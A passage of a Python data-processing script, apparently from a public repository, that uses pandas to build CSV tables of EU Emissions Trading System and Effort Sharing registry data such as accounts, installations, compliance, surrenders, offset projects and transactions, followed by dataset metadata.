\"allocatedTotal\",\n }\n )\n df_comp[\"surrendered\"] = df_comp.surrenderedAea + df_comp.surrenderedCredits\n\n # FIT ESD into standard data model creating installations for each country\n # - create some installations that represent countries under the ESD. We\n # used f\"{country_id}_ESD\" as installation id\n # - add this id to the compliance table\n # - establish the link between accounts and installations\n # - create table with surrendering details\n df_comp[\"installation_id\"] = df_comp.registry_id.map(lambda x: f\"{x}_esd\")\n df_inst = pd.DataFrame({\"id\": df_comp[\"installation_id\"].unique()})\n df_inst[[\"registry_id\", \"tradingSystem\"]] = df_inst.id.str.split(\"_\", expand=True)\n df_inst[\"activity_id\"] = 1000\n df_inst[\"name\"] = \"Effort Sharing Installation: \" + df_inst.registry_id.map(\n map_registryCodes\n )\n df_acc[\"installation_id\"] = df_acc.registry_id.map(\n df_inst.set_index(\"registry_id\")[\"id\"].to_dict()\n )\n df_surr = pd.concat(\n [\n df_comp[[\"installation_id\", \"year\", \"surrenderedAea\"]]\n .assign(unitType_id=\"AEA\")\n .rename(columns={\"surrenderedAea\": \"amount\"}),\n df_comp[[\"installation_id\", \"year\", \"surrenderedCredits\"]]\n .assign(unitType_id=\"credit\")\n .rename(columns={\"surrenderedCredits\": \"amount\"}),\n ]\n ).assign(reportedInSystem=\"esd\")\n df_comp = df_comp.drop(\n [\n \"accountIdentifier\",\n \"accountStatus\",\n \"account_id\",\n \"accountIDESD\",\n \"surrenderedAea\",\n \"surrenderedCredits\",\n \"registry_id\",\n ],\n axis=1,\n ).assign(reportedInSystem=\"esd\")\n # -----------------------------------------------------------\n # transaction data\n # check if transaction table has additional projects not already represented\n # in the existing project table. If so, add them\n projects_ids = [p for p in df_tb.projectID.unique() if pd.notnull(p)]\n projects_ids_eutl = [p for p in df_projects_euets[\"id\"].unique() if pd.notnull(p)]\n to_add = np.setdiff1d(projects_ids, projects_ids_eutl)\n if len(to_add) > 0:\n cols = [\"projectID\", \"projectTrack\", \"originatingRegistry\"]\n df_projects = (\n df_tb[df_tb.projectID.isin(to_add)][cols]\n .drop_duplicates()\n .rename(\n {\n \"projectID\": \"id\",\n \"projectTrack\": \"track\",\n \"originatingRegistry\": \"country_id\",\n }\n )\n )\n df_projects[\"source\"] = \"esdTransactions\"\n df_projects_euets = pd.concat([df_projects_euets, df_projects])\n\n # remove information from transaction blocks and aggregate them\n # by numerating transaction blocks\n cols = [\n \"expiryDate\",\n \"projectTrack\",\n \"lulucfActivity\",\n \"acquiringAccountId\",\n \"acquiringAccountIdentifier\",\n \"transferringAccountId\",\n \"transferringAccountIdentifier\",\n \"transactionDate\",\n \"transactionType\",\n \"transactionURL\",\n ]\n cols = [\n \"transactionID\",\n \"projectID\",\n \"originatingRegistry\",\n \"originalCommitmentPeriod\",\n \"unitType\",\n ]\n df_tb = (\n df_tb.groupby(cols, as_index=False, dropna=False)\n .amount.sum()\n .sort_values(\"transactionID\")\n )\n df_tb[\"transactionBlock\"] = df_tb.groupby(\"transactionID\").cumcount() + 1\n\n # check that we have the same amount in transactions and blocks\n df_check = (\n (df_tb.groupby(\"transactionID\").amount.sum() * (-1))\n .reset_index()\n .merge(\n df_t.groupby(\"transactionID\", as_index=False).amount.sum(),\n on=\"transactionID\",\n )\n .set_index(\"transactionID\")\n )\n assert (df_check.sum(1).sum()) == 0, \"Missing transaction blocks\"\n # merge main transaction information with blocks\n df_trans = df_t.drop(\n [\"amount\", \"acquiringMemberState\", \"transferringMemberState\"], axis=1\n ).merge(df_tb, on=\"transactionID\", how=\"right\")\n # get correct account ids\n map_acc = dict(zip(df_acc.accountIDESD, df_acc.accountIDEutl))\n map_acc.update(map_euets_account)\n df_trans[\"acquiringAccount_id\"] = df_trans.acquiringAccountIdentifier.map(map_acc)\n df_trans[\"transferringAccount_id\"] = df_trans.transferringAccountIdentifier.map(\n map_acc\n )\n df_trans[\"transactionTypeMain_id\"] = df_trans[\"transactionType\"].map(\n lambda x: int(x.split(\"-\")[0])\n )\n df_trans[\"transactionTypeSupplementary_id\"] = df_trans[\"transactionType\"].map(\n lambda x: int(x.split(\"-\")[-1])\n )\n col_rename = {\n \"transactionID\": \"transactionID\",\n \"transactionBlock\": \"transactionBlock\",\n \"transactionDate\": \"date\",\n \"acquiringYear\": \"acquiringYear\",\n \"transferringYear\": \"transferringYear\",\n \"transactionTypeMain_id\": \"transactionTypeMain_id\",\n \"transactionTypeSupplementary_id\": \"transactionTypeSupplementary_id\",\n \"unitType\": \"unitType_id\",\n \"projectID\": \"project_id\",\n \"acquiringAccount_id\": \"acquiringAccount_id\",\n \"transferringAccount_id\": \"transferringAccount_id\",\n \"amount\": \"amount\",\n }\n df_trans = df_trans[list(col_rename.keys())].rename(columns=col_rename)\n df_trans[\"tradingSystem\"] = \"esd\"\n df_trans[\"id\"] = list(max_trans_id + i for i in range(1, len(df_trans) + 1))\n df_trans[\"unitType_id\"] = df_trans.unitType_id.map(lambda x: map_unitType.get(x))\n\n # -----------------------------------------------------------\n # save outputs\n # append tables to existing once and save\n df_acc = pd.concat([df_acc_euets, df_acc])\n df_acc_holder = pd.concat([df_acc_holder_euets, df_acc_holder])\n df_trans = pd.concat([df_trans_euets, df_trans])\n df_comp = pd.concat([df_comp_euets, df_comp])\n df_surr = pd.concat([df_surr_euets, df_surr])\n df_inst = pd.concat([df_inst_euets, df_inst])\n if save_data:\n df_acc.to_csv(dir_out + \"accounts.csv\", index=False)\n df_acc_holder.to_csv(dir_out + \"accountHolders.csv\", index=False)\n df_comp.to_csv(dir_out + \"compliance.csv\", index=False)\n df_surr.to_csv(dir_out + \"surrender.csv\", index=False)\n df_projects_euets.to_csv(dir_out + \"offset_projects.csv\", index=False)\n df_trans.to_csv(dir_out + \"transactionBlocks.csv\", index=False)\n df_inst.to_csv(dir_out + \"installations.csv\", index=False)\n return\n\n\ndef create_table_installation(dir_in, dir_out, fn_coordinates=None, fn_nace=None):\n \"\"\"Create installation table\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n :param fn_coordinates: name of file with coordinates\n :param fn_nace: name of file with nace codes\n if None, NACE codes are not processed\n \"\"\"\n # get data: installation data together with addresses with updated coordinates\n # and entitlements\n df_inst = pd.read_csv(\n dir_in + \"installations.csv\",\n )\n df_enti = pd.read_csv(\n dir_in + \"entitlements.csv\", na_values=[\"Not Applicable\", \"Not Set\"]\n )\n df_enti[\"installationID_new\"] = df_enti.registry.map(\n lambda x: map_registryCode_inv.get(x)\n )\n df_enti[\"installationID\"] = (\n df_enti[\"installationID_new\"] + \"_\" + df_enti[\"installationID\"].map(str)\n )\n df_enti = df_enti[[\"installationID\", \"euEntitlement\", \"chEntitlement\"]].copy()\n df_inst = df_inst.merge(df_enti, on=\"installationID\", how=\"left\")\n\n # add the trading system information\n df_inst[\"tradingSystem\"] = \"euets\"\n\n # transform dataframe to be consistent with Installation object\n cols_inst = {\n \"installationID\": \"id\",\n \"name\": \"name\",\n \"tradingSystem\": \"tradingSystem\",\n \"registryCode\": \"registry_id\",\n \"activity\": \"activity_id\",\n \"eprtrID\": \"eprtrID\",\n \"parent\": \"parentCompany\",\n \"subsidiary\": \"subsidiaryCompany\",\n \"permitID\": \"permitID\",\n \"icaoID\": \"designatorICAO\",\n \"monitoringPlanId\": \"monitoringID\",\n \"monitoringPlanExpiry\": \"monitoringExpiry\",\n \"monitoringPlanFirstYear\": \"monitoringFirstYear\",\n \"permitExpiry\": \"permitDateExpiry\",\n \"isAircraftOperator\": \"isAircraftOperator\",\n \"ec7482009ID\": \"ec748_2009Code\",\n \"permitEntryDate\": \"permitDateEntry\",\n \"mainAddress\": \"mainAddress\",\n \"secondaryAddress\": \"secondaryAddress\",\n \"postalCode\": \"postalCode\",\n \"city\": \"city\",\n \"country\": \"country_id\",\n \"latitude\": \"latitudeEutl\",\n \"longitude\": \"longitudeEutl\",\n \"euEntitlement\": \"euEntitlement\",\n \"chEntitlement\": \"chEntitlement\",\n }\n df_inst_to_tbl = df_inst[\n [c for c in cols_inst.keys() if c in df_inst.columns]\n ].copy()\n df_inst_to_tbl = df_inst_to_tbl.rename(columns=cols_inst)\n # convert activity id to id only (without description)\n df_inst_to_tbl.activity_id = df_inst_to_tbl.activity_id.map(\n lambda x: int(x.split(\"-\")[0])\n )\n\n if fn_coordinates is not None:\n df_ = pd.read_csv(\n fn_coordinates,\n names=[\"id\", \"latitudeGoogle\", \"longitudeGoogle\"],\n usecols=[\"id\", \"latitudeGoogle\", \"longitudeGoogle\"],\n header=0,\n )\n df_inst_to_tbl = df_inst_to_tbl.merge(df_, on=\"id\", how=\"left\")\n\n # add nace codes\n if fn_nace:\n # primarily use 2020 leakage list but fill with 15\n df_ = pd.read_csv(\n fn_nace,\n usecols=[\"id\", \"nace15\", \"nace20\"],\n dtype={\"nace15\": \"str\", \"nace20\": \"str\"},\n ).drop_duplicates()\n df_[\"nace_id\"] = df_.nace20.fillna(df_.nace15)\n df_ = df_.rename(columns={\"nace15\": \"nace15_id\", \"nace20\": \"nace20_id\"})\n df_inst_to_tbl = df_inst_to_tbl.merge(df_, on=\"id\", how=\"left\")\n # for aircraft add the nace code 51 (Air transport)\n df_inst_to_tbl.loc[\n df_inst_to_tbl.isAircraftOperator, \"nace_id\"\n ] = df_inst_to_tbl.loc[df_inst_to_tbl.isAircraftOperator, \"nace_id\"].fillna(51)\n\n # add created timestamp\n df_inst_to_tbl[\"created_on\"] = datetime.now()\n df_inst_to_tbl[\"updated_on\"] = datetime.now()\n\n # if installation does not provide a name, create one\n # since these are mostly aircraft operators we use the ec748 code and fall\n # back to the installation id\n df_inst_to_tbl.name = df_inst_to_tbl.name.fillna(\n df_inst_to_tbl.ec748_2009Code\n ).fillna(df_inst_to_tbl.id)\n # export to csv\n df_inst_to_tbl.to_csv(dir_out + \"installations.csv\", index=False, encoding=\"utf-8\")\n\n return\n\n\ndef create_table_compliance(dir_in, dir_out):\n \"\"\"Create table with compliance data\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n \"\"\"\n # get data\n df_comp = pd.read_csv(dir_in + \"compliance.csv\")\n\n # transform dataframe to be consistent with Installation object\n cols_comp = {\n \"installationID\": \"installation_id\",\n \"year\": \"year\",\n \"phase\": \"euetsPhase\",\n \"complianceCode\": \"compliance_id\",\n \"allocationFree\": \"allocatedFree\",\n \"allocationNewEntrance\": \"allocatedNewEntrance\",\n \"allocationTotal\": \"allocatedTotal\",\n \"allocation10c\": \"allocated10c\",\n \"verified\": \"verified\",\n \"verifiedCumulative\": \"verifiedCummulative\",\n \"complianceCodeUpdated\": \"verifiedUpdated\",\n \"surrendered\": \"surrendered\",\n \"surrenderedCumulative\": \"surrenderedCummulative\",\n \"reportedInSystem\": \"reportedInSystem\",\n }\n\n # calculate total allocation\n df_comp[\"allocationTotal\"] = (\n df_comp[\"allocationNewEntrance\"].fillna(0)\n + df_comp[\"allocationFree\"].fillna(0)\n + df_comp[\"allocation10c\"].fillna(0)\n )\n df_comp_to_tbl = df_comp[cols_comp.keys()].copy()\n df_comp_to_tbl = df_comp_to_tbl.rename(columns=cols_comp)\n # verified emission might have status \"Excluded\" which we set to missing (to have an int column)\n df_comp_to_tbl.verified = df_comp_to_tbl.verified.replace(\n [\"Excluded\", \"Not Reported\"], np.nan\n )\n df_comp_to_tbl.verifiedCummulative = df_comp_to_tbl.verifiedCummulative.replace(\n \"Not Calculated\", np.nan\n )\n # add created timestamp\n df_comp_to_tbl[\"created_on\"] = datetime.now()\n df_comp_to_tbl[\"updated_on\"] = datetime.now()\n\n # save table\n df_comp_to_tbl.to_csv(dir_out + \"compliance.csv\", index=False, encoding=\"utf-8\")\n\n return\n\n\ndef create_table_surrender(dir_in, dir_out):\n \"\"\"Create table with surrendering details as well as offset projects\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n \"\"\"\n # get data\n df_surr = pd.read_csv(dir_in + \"surrendering.csv\")\n\n # create offset project table\n df_proj = (\n df_surr[[\"projectID\", \"track\", \"originatingRegistry\"]]\n .dropna(subset=[\"projectID\"])\n .drop_duplicates()\n )\n df_proj.columns = [\"id\", \"track\", \"country_id\"]\n # convert country names to country ids\n df_proj.country_id = df_proj.country_id.map(map_registryCode_inv)\n df_proj[\"created_on\"] = datetime.now()\n df_proj[\"updated_on\"] = datetime.now()\n\n # ensure consistency of reportedInSystem with lookup tables\n df_surr.reportedInSystem = df_surr.reportedInSystem.str.lower()\n\n # choose and rename columns in the surrendering table an insert them into the database\n cols_surr = {\n \"installationID\": \"installation_id\",\n \"year\": \"year\",\n \"unitType\": \"unitType_id\",\n \"amount\": \"amount\",\n \"originatingRegistry\": \"originatingRegistry_id\",\n # 'accountID': 'account_id',\n \"projectID\": \"project_id\",\n # 'expiryDate': 'expiryDate',\n \"reportedInSystem\": \"reportedInSystem\",\n }\n\n df_surr_to_tbl = df_surr[cols_surr.keys()].copy()\n df_surr_to_tbl = df_surr_to_tbl.rename(columns=cols_surr)\n # impose lookup codes\n df_surr_to_tbl.unitType_id = df_surr_to_tbl.unitType_id.map(map_unitType_inv)\n df_surr_to_tbl.originatingRegistry_id = df_surr_to_tbl.originatingRegistry_id.map(\n map_registryCode_inv\n )\n\n # need to add an primary key for surrendendering rows\n # here we simply use the index\n df_surr_to_tbl[\"id\"] = df_surr_to_tbl.index\n\n # add created timestamp\n df_surr_to_tbl[\"created_on\"] = datetime.now()\n df_surr_to_tbl[\"updated_on\"] = datetime.now()\n\n # save data\n df_surr_to_tbl.to_csv(dir_out + \"surrender.csv\", index=False, encoding=\"utf-8\")\n df_proj.to_csv(dir_out + \"offset_projects.csv\", index=False, encoding=\"utf-8\")\n\n\ndef create_table_accountHolder(dir_in, dir_out):\n \"\"\"Create account holder table dropping duplicated account holders\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n \"\"\"\n df = pd.read_csv(dir_in + \"/contacts.csv\", na_values=[\"-\", \"na\", \".\", \"0\", \"XXX\"])\n\n # Create a unique account holder ID that identifies duplicates\n def get_duplicate_matching(df, cols_duplication, col_id):\n \"\"\"Mapping of duplicated rows to ID of first occurance of the duplicated row\n :param df: with data\n :param cols_duplication: name of columns checked for duplicates\n :param col_id: name of column with identifier\n :return: to id in first occurance row\n \"\"\"\n df_d = df[df.duplicated(subset=cols_duplication, keep=False)].drop_duplicates(\n cols_duplication\n )\n df_d[\"__newID__\"] = df_d[col_id]\n df_f = df.merge(df_d, on=cols_duplication, suffixes=(\"\", \"_y\"))\n df_f = df_f[df_f[\"__newID__\"].notnull()].copy()\n m = pd.Series(df_f[\"__newID__\"].values, index=df_f[col_id]) # .to_dict()\n return m\n\n # require a minimum of information to identify duplicates\n cols_nonNull = [\"name\", \"mainAddress\", \"city\", \"country\"]\n df_ = df[df[cols_nonNull].notnull().all(axis=1)]\n\n # get duplicates by all columns (except associated accountID)\n cols_duplication = [c for c in df.columns if c not in [\"accountID\", \"accountURL\"]]\n match_all = get_duplicate_matching(df_, cols_duplication, col_id=\"accountID\")\n\n # insert map on accountHolderID into original frame\n # if not duplicate simply assign the original account ID\n df[\"accountHolderID\"] = df.accountID.map(lambda x: match_all.get(x, x))\n\n # get a mapping from account holder to accountID\n df_map_accountHolders = df[[\"accountHolderID\", \"accountID\"]].copy()\n\n # drop duplicates and map country column to codes\n df = df.drop_duplicates(\"accountHolderID\")\n\n # create country lookups instead of full country names\n df.country = df.country.map(map_registryCode_inv)\n\n # rename columns\n cols_accountHolder = {\n \"accountHolderID\": \"id\",\n \"name\": \"name\",\n \"mainAddress\": \"addressMain\",\n \"secondaryAddress\": \"addressSecondary\",\n \"postalCode\": \"postalCode\",\n \"city\": \"city\",\n \"country\": \"country_id\",\n \"telephone1\": \"telephone1\",\n \"telephone2\": \"telephone2\",\n \"eMail\": \"eMail\",\n \"legalEntityIdentifier\": \"legalEntityIdentifier\",\n # \"accountID\": \"account_id\"\n }\n df = df.rename(columns=cols_accountHolder)[cols_accountHolder.values()].copy()\n\n # add euets label trading system\n df[\"tradingSystem\"] = \"euets\"\n\n # add created timestamp\n df[\"created_on\"] = datetime.now()\n df[\"updated_on\"] = datetime.now()\n\n # save table\n df.to_csv(dir_out + \"accountHolders.csv\", index=False, encoding=\"utf-8\")\n # also save the mapping from account holder to accounts\n df_map_accountHolders.to_csv(dir_in + \"accountHolder_mapping.csv\", index=False)\n return\n\n\ndef create_table_account(dir_in, dir_out, useOrbis=True):\n \"\"\"Create account table.\n AccountHolder table needs to be created first\n :param dir_data: directory with parsed data\n :param dir_out: output directory\n :param useOrbis: use orbis data\"\"\"\n # get account data and mapping for account types\n if useOrbis:\n fn = dir_in + \"accounts_w_orbis.csv\"\n else:\n fn = dir_in + \"accounts.csv\"\n df_acc = pd.read_csv(fn, parse_dates=[\"closingDate\", \"openingDate\"])\n\n # impute account id used in transactions\n # note that we deviate from ids used in the EUTL system (i.e., the links\n # between pages) by having prepended the registry code\n map_acc_id = (\n pd.read_csv(dir_in + \"account_mapping.csv\")\n .set_index(\"accountID\")[\"accountIdentifierDB\"]\n .to_dict()\n )\n df_acc[\"accountIDTransactions\"] = df_acc.accountID.map(map_acc_id)\n # TODO verify that this is correct. Couldn't it be that the account simply\n # was never involved in an transaction?\n df_acc[\"isRegisteredEutl\"] = df_acc[\"accountIDTransactions\"].notnull()\n\n # mark accounts with status \"closing pending\" as closed\n # note that accounts with missing status are accounts of MT and CY\n # in first periods. Thus, closed\n df_acc[\"status\"] = (\n df_acc.status.replace({\"closed\": False, \"open\": True, \"Closure Pending\": False})\n .fillna(False)\n .astype(\"boolean\")\n )\n\n # rename columns\n cols_account = {\n \"accountID\": \"accountIDEutl\",\n \"accountIdentifierDB\": \"accountIDTransactions\",\n \"accountName\": \"name\",\n \"registryCode\": \"registry_id\",\n \"accountType\": \"accountType_id\",\n \"openingDate\": \"openingDate\",\n \"closingDate\": \"closingDate\",\n \"status\": \"isOpen\",\n \"commitmentPeriod\": \"commitmentPeriod\",\n \"companyRegistrationNumber\": \"companyRegistrationNumber\",\n \"installationID\": \"installation_id\",\n \"isRegisteredEutl\": \"isRegisteredEutl\",\n }\n if useOrbis:\n cols_account.update(\n {\n \"jrcBvdId\": \"bvdId\",\n \"jrcLEI\": \"jrcLEI\",\n \"jrcRegistrationIdType\": \"jrcRegistrationIdType\",\n \"jrcRegistrationIDStandardized\": \"jrcRegistrationIDStandardized\",\n \"jrcOrbisName\": \"jrcOrbisName\",\n \"jrcOrbisPostalCode\": \"jrcOrbisPostalCode\",\n \"jrcOrbisCity\": \"jrcOrbisCity\",\n }\n )\n df_acc = df_acc.rename(columns=cols_account)[cols_account.values()].copy()\n\n # impose accountTypes_ids\n df_acc.accountType_id = df_acc.accountType_id.map(map_account_type_inv)\n\n # make account id unique\n def form_id(row):\n if pd.notnull(row[\"installation_id\"]):\n return f'{row[\"registry_id\"]}_{int(row[\"installation_id\"])}'\n return\n\n df_acc.installation_id = df_acc.apply(form_id, axis=1)\n\n # Clean account names:\n df_acc[\"name\"] = df_acc[\"name\"].map(lambda x: \"-\".join(x.split(\"-\")[1:])[4:])\n\n # add EU offset accounts by hand\n # NOTE: We could also identify the missing accounts my non-matches and download the information\n res = []\n for i in NEW_ACC:\n print(\"Added missing account:\", i)\n if i[\"accountIDEutl\"] in df_acc.accountIDEutl:\n continue\n\n res.append(i)\n df_new = pd.DataFrame(res)\n if len(df_new) > 0:\n df_acc = pd.concat([df_acc, df_new])\n\n # add the corresponding account holder ID\n mapper = (\n pd.read_csv(dir_in + \"accountHolder_mapping.csv\")\n .set_index(\"accountID\")\n .accountHolderID.to_dict()\n )\n df_acc[\"accountHolder_id\"] = df_acc[\"accountIDEutl\"].map(lambda x: mapper.get(x))\n\n # add created timestamp\n df_acc[\"created_on\"] = datetime.now()\n df_acc[\"updated_on\"] = datetime.now()\n\n # add column to identify trading system\n df_acc[\"tradingSystem\"] = \"euets\"\n\n # save to csv\n df_acc.to_csv(dir_out + \"accounts.csv\", index=False, encoding=\"utf-8\")\n return\n\n\ndef create_table_transaction(dir_in, dir_out):\n \"\"\"Create transaction table. This has to be run after all\n all other tables have been created.\n :param dir_data: directory with parsed data\n :param dir_out: output directory\"\"\"\n # load data: we need original transaction data as well as\n # as the account table with new account ID. Also load already\n # created project table to (eventually) add further projects.\n # Finally, unit type mappings to map to unitType_id\n # merge information from main transaction table to blocks\n df = pd.read_csv(\n dir_in + \"transactionBlocks.csv\",\n low_memory=False,\n parse_dates=[\"transactionDate\"],\n )\n\n # extract cdm projects included in transaction data\n # in version 05/2021 that does not seem to be necessary anymore\n # NOTE: Here we drop one entry for project 5342 which as origin entry GH and NG.\n df_proj_trans = (\n df[[\"projectID\", \"projectTrack\", \"originatingRegistry\"]]\n .dropna(subset=[\"projectID\"])\n .drop_duplicates(subset=[\"projectID\"])\n )\n df_proj_trans.columns = [\"id\", \"track\", \"country_id\"]\n\n df_proj_trans[\"created_on\"] = datetime.now()\n df_proj_trans[\"updated_on\"] = datetime.now()\n df_proj_trans[\"source\"] = \"transactions\"\n df_proj_trans\n df_proj = pd.read_csv(dir_out + \"offset_projects.csv\")\n df_proj[\"source\"] = \"surrendering_details\"\n # only include those additional projects\n df_proj_trans = df_proj_trans[~df_proj_trans[\"id\"].isin(df_proj[\"id\"])]\n df_proj_new = pd.concat([df_proj, df_proj_trans])\n df_proj_new.to_csv(dir_out + \"offset_projects.csv\", index=False, encoding=\"utf-8\")\n\n # create accounts which do not exist in the account table\n # get accounts with accountID in transaction data but\n # account missing in account table (all MT0 and CY0)\n # we create accounts out of the data provided in the\n # transaction data\n res = []\n for pf in [\"acquiring\", \"transferring\"]:\n df_miss = df[df[pf + \"AccountID\"].isnull()].drop_duplicates()\n df_miss = df_miss[\n [\n pf + \"AccountIdentifierDB\",\n pf + \"AccountIdentifier\",\n pf + \"AccountName\",\n pf + \"RegistryCode\",\n ]\n ]\n df_miss.columns = [\n \"accountIdentifierDB\",\n \"accountIDTransactions\",\n \"accountName\",\n \"registryCode\",\n ]\n res.append(df_miss)\n df_miss = pd.concat(res).drop_duplicates()\n\n # for those accounts without an accountIdentierDB we\n # create an account \"unknwon\" which is unique by country\n if df_miss[df_miss.accountIdentifierDB.isnull()].registryCode.is_unique:\n df_miss.accountIdentifierDB = df_miss.accountIdentifierDB.fillna(\n df_miss.registryCode + \"_unknown\"\n )\n df_miss.accountIDTransactions = df_miss.accountIDTransactions.fillna(\"unknown\")\n\n # these are accounts that are missing in the account database\n # to easily identify and to get in conflict with newly emerging\n # account IDs provided by the EUTL, we assign negative integers\n # as account ids\n df_miss = df_miss.reset_index(drop=True)\n df_miss[\"accountIDEutl\"] = -df_miss.index - 1\n df_miss[\"created_on\"] = datetime.now()\n df_miss[\"updated_on\"] = datetime.now()\n\n # also insert the corresponding account id into the\n # transaction block data\n map_acc_new = (\n df_miss[[\"accountIdentifierDB\", \"accountIDEutl\"]]\n .set_index(\"accountIdentifierDB\")[\"accountIDEutl\"]\n .to_dict()\n )\n for pf in [\"acquiring\", \"transferring\"]:\n df[pf + \"AccountIdentifierDB\"] = df[pf + \"AccountIdentifierDB\"].fillna(\n df[pf + \"RegistryCode\"] + \"_unkown\"\n )\n df[pf + \"AccountID\"] = df[pf + \"AccountID\"].fillna(\n df[pf + \"AccountIdentifierDB\"].map(lambda x: map_acc_new.get(x))\n )\n\n # Update account list as well as account mapping list\n df_map_acc = pd.read_csv(dir_in + \"account_mapping.csv\")\n df_map_acc = pd.concat(\n [\n df_map_acc,\n pd.DataFrame(\n [[k, v] for k, v in map_acc_new.items()],\n columns=[\"accountIdentifierDB\", \"accountID\"],\n ),\n ]\n )\n df_acc = pd.read_csv(dir_out + \"accounts.csv\", low_memory=False)\n df_acc = pd.concat(\n [\n df_acc,\n df_miss.rename(\n columns={\n \"accountName\": \"name\",\n \"registryCode\": \"registry_id\",\n }\n ),\n ]\n )\n mapper = df_map_acc.set_index(\"accountID\")[\"accountIdentifierDB\"].to_dict()\n df_acc.accountIdentifierDB = df_acc.accountIDEutl.map(lambda x: mapper.get(x))\n df_acc.to_csv(dir_out + \"accounts.csv\", index=False)\n df_map_acc.to_csv(dir_in + \"account_mapping_w_esd.csv\", index=False)\n\n # select and rename transaction columns and save to csv\n cols_trans = {\n \"transactionID\": \"transactionID\",\n \"transactionDate\": \"date\",\n \"transactionTypeMain\": \"transactionTypeMain_id\",\n \"transactionTypeSupplementary\": \"transactionTypeSupplementary_id\",\n \"transferringAccountID\": \"transferringAccount_id\",\n \"acquiringAccountID\": \"acquiringAccount_id\",\n \"unitTypeCode\": \"unitType_id\",\n \"projectID\": \"project_id\",\n \"amount\": \"amount\",\n }\n df = df.rename(columns=cols_trans)\n df = df[cols_trans.values()]\n df[\"id\"] = df.reset_index().index\n\n # add created timestamp\n df[\"created_on\"] = datetime.now()\n df[\"updated_on\"] = datetime.now()\n\n # add information on trading system\n df[\"tradingSystem\"] = \"euets\"\n\n # save to csv\n df.to_csv(dir_out + \"transactionBlocks.csv\", index=False, encoding=\"utf-8\")\n return\n\n\ndef create_tables_lookup(dir_in, dir_out, fn_nace_codes=None):\n \"\"\"Create transaction table.\n We only alter the header of tables from \"code\" to \"id\"\n :param dir_data: directory with parsed data\n :param dir_out: output directory\n :param fn_nace_codes: name of file with nace classification scheme\n If None, classification lookup not exported\"\"\"\n export_mappings(dir_in)\n for fn in glob.iglob(dir_in + \"*Codes.csv\"):\n fn_out = dir_out + \"/\" + os.path.basename(fn)\n df = pd.read_csv(fn, keep_default_na=False)\n df.columns = [\"id\", \"description\"]\n df.to_csv(fn_out, index=False, encoding=\"utf-8\")\n if fn_nace_codes is not None:\n fn_out = dir_out + \"/\" + os.path.basename(fn_nace_codes)\n df = pd.read_csv(fn_nace_codes)\n df.to_csv(fn_out, index=False, encoding=\"utf-8\")\n\n return\n", "repo_name": "jabrell/eutl_scraper", "sub_path": "eutl_data_augmentation/create_tables.py", "file_name": "create_tables.py", "file_ext": "py", "file_size_in_byte": 38176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.to_datetime", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pandas.isnull", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 194, "usage_type": "call"}, {"api_name": "mappings.map_registryCodes", "line_number": 228, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 261, "usage_type": "call"}, {"api_name": "mappings.map_registryCodes", "line_number": 265, "usage_type": "argument"}, {"api_name": "pandas.concat", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 296, "usage_type": "call"}, {"api_name": "pandas.notnull", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 313, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 393, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 394, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 395, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 396, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 397, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 398, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 423, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv.get", "line_number": 427, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 427, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 477, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 488, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 502, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 502, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 503, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 503, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 553, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 556, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 559, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 559, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 560, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 560, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 574, "usage_type": "call"}, {"api_name": "mappings.map_registryCode_inv", "line_number": 584, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 585, "usage_type": 